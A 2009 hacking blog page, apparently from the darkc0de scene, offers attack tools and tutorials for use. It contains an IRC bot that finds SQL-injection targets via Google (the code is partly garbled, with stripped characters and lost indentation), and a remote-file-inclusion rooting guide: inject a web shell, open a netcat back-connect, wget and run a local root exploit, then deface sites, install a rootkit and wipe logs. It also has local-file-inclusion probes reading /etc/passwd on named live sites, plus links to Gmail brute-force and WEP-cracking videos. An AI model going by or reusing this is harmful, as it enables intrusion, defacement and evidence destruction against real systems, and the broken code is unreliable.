Monday, March 9, 2009

Using SQLi Scanner Bot - sqlifinderbot.py (Video - QuickTime Required) [Source]

Download Tutorial :- http://darkc0de.com/tutorials/SQLiFinderb0t.zip


#!/usr/bin/env python
################################################################
# .___ __ _______ .___ #
# __| _/____ _______| | __ ____ \ _ \ __| _/____ #
# / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ #
# / /_/ | / __ \| | \/ <\ \___\ \_/ \/ /_/ \ ___/ #
# \____ |(______/__| |__|_ \\_____>\_____ /\_____|\____\ #
# \/ \/ \/ #
# ___________ ______ _ __ #
# _/ ___\_ __ \_/ __ \ \/ \/ / #
# \ \___| | \/\ ___/\ / #
# \___ >__| \___ >\/\_/ #
# est.2007 \/ \/ forum.darkc0de.com #
################################################################
# SQLi Error Scanner /w Google Search

# darkc0decracker Crew
# www.darkc0decracker.blogspot.com

# Greetz to
# d3hydr0, P47r1ck, Tarsian, c0mr@d, reverenddigitalx, beenu, baltazar, C1c4Tr1Z, Well0ne
# and the rest of the Darkc0de members

# This was written for educational purpose only. Use it at your own risk.
# Author will be not responsible for any damage!
# Intended for authorized Web Application Pen Testing!

import sys, socket, re, string, urllib2, sets, random, time, threading

# Argument-count gate: exactly four positional arguments (server host, port,
# nick, channel) are accepted, so the len(sys.argv) == 6 branch further down
# that would read a channel key from argv[5] can never run.
# NOTE(review): the usage string has lost its placeholders in this copy
# (presumably angle-bracketed names stripped as HTML tags).
if len(sys.argv) != 5:
print "Usage: ./sqlifinderb0t.py "
sys.exit(1)

# Browser User-Agent strings picked at random for the Google requests in
# getsites(). All four name long-obsolete browsers, which makes that traffic
# easy to fingerprint server-side; the probe requests in test() do NOT use
# this list (they go out with urllib2's default User-Agent).
agents = ["Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)",
"Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)",
"Microsoft Internet Explorer/4.0b1 (Windows 95)",
"Opera/8.00 (Windows NT 5.1; U; en)"]

# Google "hl" language codes listed by the !langs command; informational only.
langs = ["en", "it", "nl", "ru", "ua", "pl", "de", "be", "kr", "fr", "es", "se", "no", "ir", "za"]
sites=[]  # raw result URLs appended by getsites()
tba=[]  # sites not yet listed in sqlitested.txt (computed by !search)
threads =[]  # TestThread instances started by the most recent !test
numthreads = 1  # replaced by the raw string from !threads; always read via int()
verbose = 0  # replaced by the raw string from !verbose; always read via int()
#---------------------------------------------------------
#Edit what you want added to the address.
# Appended verbatim to every URL by parse_urls(); a single quote here.
EXT = "'"

#Edit what you want to search for.
# Substring searched for in each response body by test().
MATCH = "error in your SQL syntax"
#---------------------------------------------------------
#---------------------------------------------------------

def getsites(lang):
"""Scrape Google result pages for the global `query` and append hits to `sites`.

Reads the module globals `query` and `arg_page_end` (assigned by the
!search handler), `s` (the IRC socket) and `line` (the last parsed IRC
line); calling it before those exist raises NameError. Walks result pages
in steps of 10 until `arg_page_end`, sleeping 3 s between requests and
sending a random entry of `agents` as User-Agent. Stops early when the
page text contains "403 Forbidden" (the author's captcha/rate-limit
check). Only IOError is handled; any other exception propagates.

Args:
    lang: value for Google's "hl" parameter.
"""
try:
page_counter=0
while page_counter < int(arg_page_end):
# Stray IRC keep-alive copied from the main loop: it answers whatever
# `line` held when !search was issued, not an actual PING.
s.send("PONG %s\r\n" % line[1])
time.sleep(3)
results_web = 'http://www.google.com/search?q='+str(query)+'&hl='+str(lang)+'&lr=&ie=UTF-8&start='+repr(page_counter)+'&sa=N'
request_web = urllib2.Request(results_web)
request_web.add_header('User-Agent',random.choice(agents))
opener_web = urllib2.build_opener()
text = opener_web.open(request_web).read()
if re.search("403 Forbidden", text):
s.send("PRIVMSG %s :%s\r\n" % (CHAN, "[-] Received Captcha... Damn that sucks!"))
break
# NOTE(review): as printed, the pattern starts with '+', which re rejects
# ("nothing to repeat"), and every .replace("","") is a no-op -- this copy
# of the script appears to have lost characters (probably HTML tags that
# were stripped when the page was rendered).
names = re.findall(('+[\w\d\?\/\.\=\s\-]+=+[\d]+[\w\d\?\/\.\=\s\-]+'),text.replace("","").replace("",""))
for name in names:
# Drop Google's " - 12k - " size suffix and trailing " -" from the match.
name = re.sub(" - \d+k - ","",name.replace("","")).replace("","")
name = name.rstrip(" -")
sites.append(name)
page_counter +=10

except IOError:
s.send("PRIVMSG %s :%s\r\n" % (CHAN, "[-] Can't connect to Google Web!"))

def parse_urls(links):
"""Return the de-duplicated links that contain '=' with EXT appended to each.

For every link containing '=', str.rsplit() is called with the literal
text `=+[\d]` as separator -- rsplit takes a plain substring, not a
regex, so unless that exact text occurs the link is returned unchanged and
EXT is simply appended to the full URL. Links without '=' are dropped.
Relies on the Python 2-only `sets` module and `xrange`.

Args:
    links: iterable of URL strings.

Returns:
    list of unique URL strings (order not preserved).
"""
urls = []
for link in links:
num = link.count("=")
if num > 0:
for x in xrange(num):
link = link.rsplit(('=+[\d]'),x+1)[0]
urls.append(link+EXT)
urls = list(sets.Set(urls))
return urls

def test(host):
"""Fetch `host` (prefixing http:// if absent) and look for MATCH in the body.

Sets a 5 s default socket timeout process-wide on every call. A body
containing MATCH is announced in CHAN and appended to foundsqli.txt;
otherwise a "Not Vuln" line is sent only when `verbose` is "1". Socket
errors are reported to the channel; the trailing bare `except: pass`
silently discards every other failure (including HTTPError raised by
urlopen for non-2xx responses), so nothing is logged for those hosts.

Detection note: urlopen() is called without custom headers, so unlike the
Google requests these probes carry urllib2's default "Python-urllib/x.y"
User-Agent, and each request is the original URL with EXT (a single
quote) appended.

Args:
    host: URL string, already carrying the EXT suffix from parse_urls().
"""
socket.setdefaulttimeout(5)
if int(verbose) == 1:
s.send("PRIVMSG %s :%s%s\r\n" % (CHAN, "[+] Testing:", host))
try:
if host[:7] != "http://":
host = "http://"+host
source = urllib2.urlopen(host).read()
if re.search(MATCH, source):
s.send("PRIVMSG %s :%s%s\r\n" % (CHAN, "[!] Found:", host))
# `file` shadows the builtin; appended without any locking across threads.
file = open("foundsqli.txt", "a")
file.write("\n[!] Found: "+host)
file.close()
else:
if int(verbose) == 1:
s.send("PRIVMSG %s :%s%s\r\n" % (CHAN, "[-] Not Vuln:", host))
except(socket.gaierror, socket.timeout, socket.error), msg:
s.send("PRIVMSG %s :%s%s @ %s\r\n" % (CHAN, "[-] Error: ",msg, host))
# Bare except: swallows everything else, SystemExit/KeyboardInterrupt included.
except:
pass

class TestThread(threading.Thread):
"""Worker that probes one slice of `tba` and then logs that slice as tested."""
def __init__(self,hosts):
# hosts: the slice of URLs this worker owns.
# fcount: 0 until run() finishes, then 1; !status sums it over all threads.
self.hosts=hosts
self.fcount = 0
threading.Thread.__init__(self)

def run (self):
# Probe each derived URL; a KeyboardInterrupt inside test() skips only that URL.
urls = parse_urls(self.hosts)
for url in urls:
try:
test(url.replace("\n",""))
except(KeyboardInterrupt):
pass
# Every host in the slice is recorded regardless of the probe outcome;
# !search later excludes anything listed here. Each worker appends to the
# same file with no lock, so with several threads the writes presumably
# interleave. `file` shadows the builtin.
file = open("sqlitested.txt", "a")
for tbw in self.hosts:
file.write(tbw+"\n")
file.close()
self.fcount+=1

# IRC connection parameters taken from argv. The argument-count check at the
# top exits unless exactly four arguments are given, so the len(sys.argv) == 6
# branch is unreachable and PASS (the channel key) is always "".
PASS = ""
HOST = sys.argv[1]
PORT = int(sys.argv[2])
NICK = sys.argv[3]
CHAN = sys.argv[4]
if len(sys.argv) == 6:
PASS = sys.argv[5]
readbuffer = ""
# Plain TCP to the IRC server: no TLS, no server password, and nothing below
# authenticates who may drive the bot -- every command is honoured from any
# nick that speaks in CHAN. The JOIN is sent before any server reply is read.
s=socket.socket( )
s.connect((HOST, PORT))
s.send("NICK %s\r\n" % NICK)
s.send("USER %s %s bla :%s\r\n" % (NICK, NICK, NICK))
s.send("JOIN :%s %s\r\n" % (CHAN, PASS))

# Main IRC read loop. Each recv() chunk is appended to readbuffer, complete
# lines are split off on "\n" and the unterminated tail is kept for the next
# read. After string.split(), an IRC line is indexed as: line[0] prefix
# (":nick!user@host"), line[1] command, line[2] target, line[3] first word of
# the message text (still carrying its leading ':'), line[4..] further words --
# which is why every bot command is compared against ":!name".
#
# Security note: no handler checks line[0] (the sender) or line[2] (the
# target), so any nick that can speak in the channel can drive the bot,
# including shutting it down with !die. Only IndexError is caught around the
# handlers; every other exception (see the inline notes) terminates the
# process. Indentation was lost in this copy; the nesting below is inferred
# from statement order.
while 1:
readbuffer=readbuffer+s.recv(1024)
temp=string.split(readbuffer, "\n")
readbuffer=temp.pop( )
for line in temp:
line=string.rstrip(line)
line=string.split(line)
try:
# Banner is sent for every JOIN observed, the bot's own included.
if line[1] == "JOIN":
name = str(line[0].split("!")[0])
s.send("PRIVMSG %s :%s%s\r\n" % (CHAN, "Welcome, ", name.replace(":","")))
s.send("PRIVMSG %s :%s\r\n" % (CHAN, "|----------------------------|"))
s.send("PRIVMSG %s :%s\r\n" % (CHAN, "| rsauron[at]gmail[dot]com v1.0"))
s.send("PRIVMSG %s :%s\r\n" % (CHAN, "| 8/2008 SQLi Finder Bot"))
s.send("PRIVMSG %s :%s\r\n" % (CHAN, "| - Scans Sites for SQLi errors"))
s.send("PRIVMSG %s :%s\r\n" % (CHAN, "| - Retreives Targets from Google"))
s.send("PRIVMSG %s :%s\r\n" % (CHAN, "| - Stores logs of Found and Tested"))
s.send("PRIVMSG %s :%s\r\n" % (CHAN, "| - Multi-Threading Scanning! - WOW"))
s.send("PRIVMSG %s :%s\r\n" % (CHAN, "| type !help - for help "))
s.send("PRIVMSG %s :%s\r\n" % (CHAN, "|----------------------------|"))
if line[3] == ":!help":
s.send("PRIVMSG %s :%s\r\n" % (CHAN, "[+] Displaying list of commands the bot understands"))
s.send("PRIVMSG %s :%s\r\n" % (CHAN, "[+] !status - Shows status of b0t!"))
s.send("PRIVMSG %s :%s\r\n" % (CHAN, "[+] !clear - Clears the hosts in the testing array!!"))
s.send("PRIVMSG %s :%s\r\n" % (CHAN, "[+] !search - Gets sites to test! ex. !search "))
s.send("PRIVMSG %s :%s\r\n" % (CHAN, "[+] !show - Show list of sites to be tested!"))
s.send("PRIVMSG %s :%s\r\n" % (CHAN, "[+] !test - Preform Test on sites in testing array!"))
s.send("PRIVMSG %s :%s\r\n" % (CHAN, "[+] !langs - Shows a list a of langs that can be used for search function!"))
s.send("PRIVMSG %s :%s\r\n" % (CHAN, "[+] !threads - Set the number of threads to be used in testing.. default is 1!"))
s.send("PRIVMSG %s :%s\r\n" % (CHAN, "[+] !verbose - Verbosity ON = 1 - Verbosity OFF = 0 - Default is OFF"))
s.send("PRIVMSG %s :%s\r\n" % (CHAN, "[+] !die - Kills b0t!"))
if line[3] == ":!langs":
s.send("PRIVMSG %s :%s\r\n" % (CHAN, "[+] These are just some langs you could use...!"))
for lang in langs:
s.send("PRIVMSG %s :%s%s\r\n" % (CHAN, "[+] ",lang))
# Unauthenticated remote shutdown; SystemExit is not an IndexError, so it propagates.
if line[3] == ":!die":
s.send("PRIVMSG %s :%s\r\n" % (CHAN, "[-] b0t dying... vist darkc0de.com!!"))
sys.exit(1)
# Expects three words after the command: query, language, last page index.
# A shorter message raises IndexError here, which the handler below swallows.
if line[3] == ":!search":
query = line[4]
lang = line[5]
arg_page_end = line[6]
s.send("PRIVMSG %s :%s%s\r\n" % (CHAN, "[+] Query: ", query))
s.send("PRIVMSG %s :%s%s\r\n" % (CHAN, "[+] Language: ", lang))
s.send("PRIVMSG %s :%s%s\r\n" % (CHAN, "[+] Search ends: ", arg_page_end))
s.send("PRIVMSG %s :%s\r\n" % (CHAN, "[+] Starting search..."))
getsites(lang)
sites = list(sets.Set(sites))
# Opened read-only: if sqlitested.txt does not exist yet (first run), the
# resulting IOError is not caught by the `except(IndexError)` below.
testedfile = open("sqlitested.txt", "r")
testedsites = testedfile.read()
testedfile.close()
if testedsites.endswith("\n"):
testedsites = testedsites.rstrip("\n")
testedsites = testedsites.split("\n")
# Anything already logged as tested is excluded from the next run.
s1 = set(sites)
s2 = set(testedsites)
tba = list(s1.difference(s2))
s.send("PRIVMSG %s :%s%s%s\r\n" % (CHAN, "[+] Found ", len(tba), " sites to test!"))
if line[3] == ":!clear":
tba=[]
sites=[]
s.send("PRIVMSG %s :%s\r\n" % (CHAN, "[-] Testing array cleared..."))
if line[3] == ":!status":
s.send("PRIVMSG %s :%s%s\r\n" % (CHAN, "[+] Number of sites loaded in testing array: ", len(tba)))
s.send("PRIVMSG %s :%s%s\r\n" % (CHAN, "[+] Number of threads set for scanning: ", numthreads))
# Each finished TestThread contributes fcount == 1.
masterthread = 0
if threads != []:
for thread in threads:
masterthread+=thread.fcount
s.send("PRIVMSG %s :%s%s\r\n" % (CHAN, "[+] Number of threads finished scanning: ", masterthread))
if int(verbose) == 1:
s.send("PRIVMSG %s :%s\r\n" % (CHAN, "[+] Verbosity Set ON!"))
if int(verbose) == 0:
s.send("PRIVMSG %s :%s\r\n" % (CHAN, "[+] Verbosity Set OFF!"))

if line[3] == ":!show":
s.send("PRIVMSG %s :%s\r\n" % (CHAN, "[+] Showing sites to be tested..."))
if len(tba) < 50:
for site in tba:
s.send("PRIVMSG %s :%s%s\r\n" % (CHAN, "[+] ", site))
else:
s.send("PRIVMSG %s :%s\r\n" % (CHAN, "[-] More then 50 sites in list... Just to many hosts to print to term! sry!"))
s.send("PRIVMSG %s :%s\r\n" % (CHAN, "[+] Done!"))
# Stored as the raw string; int(numthreads) in !test raises ValueError
# (uncaught) on non-numeric input from the channel.
if line[3] == ":!threads":
numthreads = line[4]
s.send("PRIVMSG %s :%s%s\r\n" % (CHAN, "[+] Number of threads set for testing: ", numthreads))
# Same: int(verbose) raises ValueError on anything but digits.
if line[3] == ":!verbose":
verbose = line[4]
if int(verbose) == 1:
s.send("PRIVMSG %s :%s\r\n" % (CHAN, "[+] Verbosity Set ON!"))
if int(verbose) == 0:
s.send("PRIVMSG %s :%s\r\n" % (CHAN, "[+] Verbosity Set OFF!"))
if line[3] == ":!test":
# tba is a list, so `tba == 0` is never true: an empty list falls through
# to the else branch and starts numthreads workers with empty slices.
if tba == 0:
s.send("PRIVMSG %s :%s\r\n" % (CHAN, "[-] No sites to test..."))
else:
s.send("PRIVMSG %s :%s%s%s\r\n" % (CHAN, "[+] Beginning test of ", len(tba), " sites!"))
threads=[]
# Python 2 integer division: tba is cut into numthreads contiguous slices of i.
i = len(tba) / int(numthreads)
for x in range(0, int(numthreads)):
if (x-1) == int(numthreads):
sliced = tba[x*i:]
else:
sliced = tba[x*i:(x+1)*i]
thread = TestThread(sliced)
thread.start()
threads.append(thread)

except(IndexError):
pass

# Keep-alive reply; its placement relative to the try/except is inferred
# (indentation lost in this copy).
if(line[0]=="PING"):
s.send("PONG %s\r\n" % line[1])

Sunday, March 8, 2009

R.F.I. Rooting Tutorial

=======================================================================
R.F.I. Rooting Tutorial (Linux Server and Safe Mod: OFF)

Author: An@sA_StAxtH
Mail/MSN: admin@cyberanarchy.org/anasa_staxth@hotmail.com

For Cyber Anarchy (Nov. 2007)
=======================================================================

You will need:

- Vulnerable Site in R.F.I.
- Shell for R.F.I. (e.g. c99, r57 or other)
- NetCat
- Local Root Exploit (depending on the kernel and the version)

This aim tutorial is to give a very general picture in process of Rooting
in Linux Server with Safe Mod: OFF.

-

Suppose that we have found a site with R.F.I. vulnerability:

http://www.hackedsite.com/folder/index.html?page=

We can run the shell by exploiting Remote File Inclusion, as follows:

http://www.hackedsite.com/folder/index.html?page=http://www.mysite.com/shells/evilscript.txt?

where evilscript.txt is our web shell that we have already uploaded to
our site. (www.mysite.com in the folder: shells)

After we enter in shell, first of all we will see the version of the kernel
at the top of the page or by typing: uname - a in Command line.

To continue we must connect with a back-connection to the box. This can be done in
two ways if we have a suitable shell.

We can use the Back-Connect module of r57/c99 shell or to upload a backconnector
in a writable folder

In most of the shells there is a back-connection feature that does not require uploading the
Connect Back Shell (or another shell in perl/c). We will analyze the first
way, which is built into the shell (in our example the shell is r57).

Initially we open NetCat and give to listen in a specific port (this port must
be correctly opened/forwarded in NAT/Firewall if we have a router) with the
following way:

We will type: 11457 in the port input (This is the default port for the latest versions
of r57 shell). We can also use another port.

We press in Windows Start -> Run -> and we type: cmd
After we will go to the NetCat directory:

e.g.

cd C:\Program Files\Netcat

And we type the following command:

nc -n -l -v -p 11457

NetCat respond: listening on [any] 11457 ...

In the central page of r57 shell we find under the following menu::: Net:: and
back-connect. In the IP Form we will type our IP (www.cmyip.com to see our ip if
we have dynamic)

In the Port form we will put the port that we opened and NetCat listens.

If we press connect the shell will respond:

Now script try connect to port 11457 ...

If our settings are correct NetCat will give us a shell to the server

Now we will continue to the rooting process.

We must find a writable folder in order to download and compile the Local
Root Exploit that will give us root privileges in the box. Depending on the version
of the Linux kernel there are different exploits. Sometimes the exploits fail to run
because some boxes are patched or we don't have the correct permissions.

List of the exploits/kernel:

2.4.17 -> newlocal, kmod, uselib24
2.4.18 -> brk, brk2, newlocal, kmod
2.4.19 -> brk, brk2, newlocal, kmod
2.4.20 -> ptrace, kmod, ptrace-kmod, brk, brk2
2.4.21 -> brk, brk2, ptrace, ptrace-kmod
2.4.22 -> brk, brk2, ptrace, ptrace-kmod
2.4.22-10 -> loginx
2.4.23 -> mremap_pte
2.4.24 -> mremap_pte, uselib24
2.4.25-1 -> uselib24
2.4.27 -> uselib24
2.6.2 -> mremap_pte, krad, h00lyshit
2.6.5 -> krad, krad2, h00lyshit
2.6.6 -> krad, krad2, h00lyshit
2.6.7 -> krad, krad2, h00lyshit
2.6.8 -> krad, krad2, h00lyshit
2.6.8-5 -> krad2, h00lyshit
2.6.9 -> krad, krad2, h00lyshit
2.6.9-34 -> r00t, h00lyshit
2.6.10 -> krad, krad2, h00lyshit
2.6.13 -> raptor, raptor2, h0llyshit, prctl
2.6.14 -> raptor, raptor2, h0llyshit, prctl
2.6.15 -> raptor, raptor2, h0llyshit, prctl
2.6.16 -> raptor, raptor2, h0llyshit, prctl

We will see the case of 2.6.8 Linux kernel. We will need the h00lyshit exploit.

Some sites that we can find Local Root Exploits:

www.milw0rm (Try Search: "linux kernel")

Other sites: www.packetstormsecurity.org | www.arblan.com
or try Googlin' you can find 'em all ;-)

We can find writable folders/files by typing:

find / -perm -2 -ls

We can use the /tmp folder which is a standard writable folder

We type: cd /tmp

To download the local root exploit we can use a download command for linux like
wget.

For example:

wget http://www.arblan.com/localroot/h00lyshit.c

where http://www.arblan.com/localroot/h00lyshit.c is the url of h00lyshit.

After the download we must compile the exploit (Read the instruction of the exploit
before the compile)

For the h00lyshit we must type:

gcc h00lyshit.c -o h00lyshit

Now we have created the executable file: h00lyshit.

The command to run this exploit is:

./h00lyshit

We need a very big file on the disk in order to run successfully and to get root.

We must create a big file in /tmp or into another writable folder.

The command is:

dd if=/dev/urandom of=largefile count=2M

where largefile is the filename.

We must wait 2-3 minutes for the file creation

If this command fails we can try:

dd if=/dev/zero of=/tmp/largefile count=102400 bs=1024

Now we can proceed to the last step. We can run the exploit by typing:

./h00lyshit largefile or

./h00lyshit /tmp/largefile

(If we are in a different writable folder and the largefile is created in /tmp)

If there are not running errors (maybe the kernel is patched or is something wrong with
exploit run or large file) we will get root

To check if we got root:

id or

whoami

If it says root we got root!

Now we can deface/mass deface all the sites of the server or to setup a rootkit (e.g.
SSHDoor) and to take ssh/telnet shell access to the server.

We must erase all logs in order to be safe with a log cleaner. A good cleaner for this
job is the MIG Log Cleaner.

-

*

Local File Inclusion Tutorial - Written by d3hydr0

[- How to Find LFI Vulnerability -]

How to Find LFI Vulnerability, Well i use me of adding ..
Example

www.site.com/index.php?p=..





Real World Examples:

http://www.jedit.org/index.php?page=..




Warning: main(...html): failed to open stream: No such file or directory in /home/groups/j/je/jedit/htdocs/index.php on line
63

Warning: main(): Failed opening '...html' for inclusion (include_path='.:/usr/local/share/pear') in /home/groups/j/je/jedit/htdocs/index.
php on line 63




This is not vulnerable.
A vulnerable one should look like

Warning: include() [function.include]: Failed opening '...php' for inclusion (include_path='.:/usr/share/pear') in /
home/shiner/shiner.com/htdocs/beers/beers-home.php on line 62




include is the code , the script is using for example



$page = $_GET[page];
include($page);
?>




Should be [function.include]
but


$page = $_GET[page];
require_once($page);
?>




should be [function.require_once] or [function.require]

[- Find Example (Real) -]

http://www.crew4sea.com/indexm.php?url=..




Gives us.

Fatal error: require_once() [function.require]: Failed opening required './..' (include_path='.:/:/usr/php/pear'
) in /indexm.php on line 164




[b][function.require][/b]




So we know it is vulnerable.

if Windows OS, you can just do

http://www.crew4sea.com/indexm.php?url=indexm.php





other try
http://www.crew4sea.com/indexm.php?url=/etc/passwd
http://www.crew4sea.com/indexm.php?url=/etc/passwd
http://www.crew4sea.com/indexm.php?url=../etc/passwd
http://www.crew4sea.com/indexm.php?url=../etc/passwd

until you get Something.

Tutorial on How To Hide Files in JPEG Images.


Written Tutorial:
In this example we will hide a text message inside a picture. We have chosen for this tutorial a text file named Secret.txt and a picture firefox.jpg.

1. Move your files you want to combine in a new folder, in our case C:\Hidden.

2. Add the file you want to hide into a new RAR archive (in our example named Secret.txt.rar).

3. WinRar created the archive in the folder where our files are located.

4. Open Command Prompt (Start -> Run..., type cmd and press Enter).

5. Go to the folder where your files are located, in this case C:\Hidden by using the cmd command.

6. Now type copy /b firefox.jpg + secret.txt.rar helpero.jpg where firefox.jpg is the original picture, secret.txt.rar is the file that will be hidden, and helpero.jpg is the file which contains both.

7. If you open helpero.jpg you will see the firefox.jpg image.

8. Try opening the file with WinRar (select All files).


9. Now you can see the text file that is hidden in the picture.

Installing Nessus in Ubuntu

Open a terminal window and type in:
sudo apt-get install nessus
sudo apt-get install nessusd
sudo nessus-adduser
sudo ln -fs /etc/init.d/nessusd /etc/rc2.d/S20nessusd
sudo /etc/init.d/nessusd start
sudo gedit /usr/share/applications/Nessus.desktop

Insert the following lines into the new file

[Desktop Entry]
Name=Nessus
Comment=Nessus
Exec=nessus
Icon=/usr/share/pixmaps/nessus.xpm
Terminal=false
Type=Application
Categories=Application;System;

After that you can find Nessus in the Gnome menu under Applications -> System Tools.

Installing Ophcrack in Ubuntu

http://www.darkc0de.com/tutorials/ophcrack_install.html

Gmail BruteForce with gmailpopbrute.py (Video)

http://www.darkc0de.com/tutorials/gmailbrute.avi

MySQL Injection DataExt & Fuzzer

http://www.darkc0de.com/tutorials/schemafuzz-vid.zip

Airplay replay attack w/ no wireless client (Video)

http://www.darkc0de.com/tutorials/Airplay_replay_attack_-_no_wireless_client_required.rar

128 bit WEP cracking w/ injection (video)

http://www.darkc0de.com/tutorials/128_Bit_Wep_Cracking_With_Injection_.rar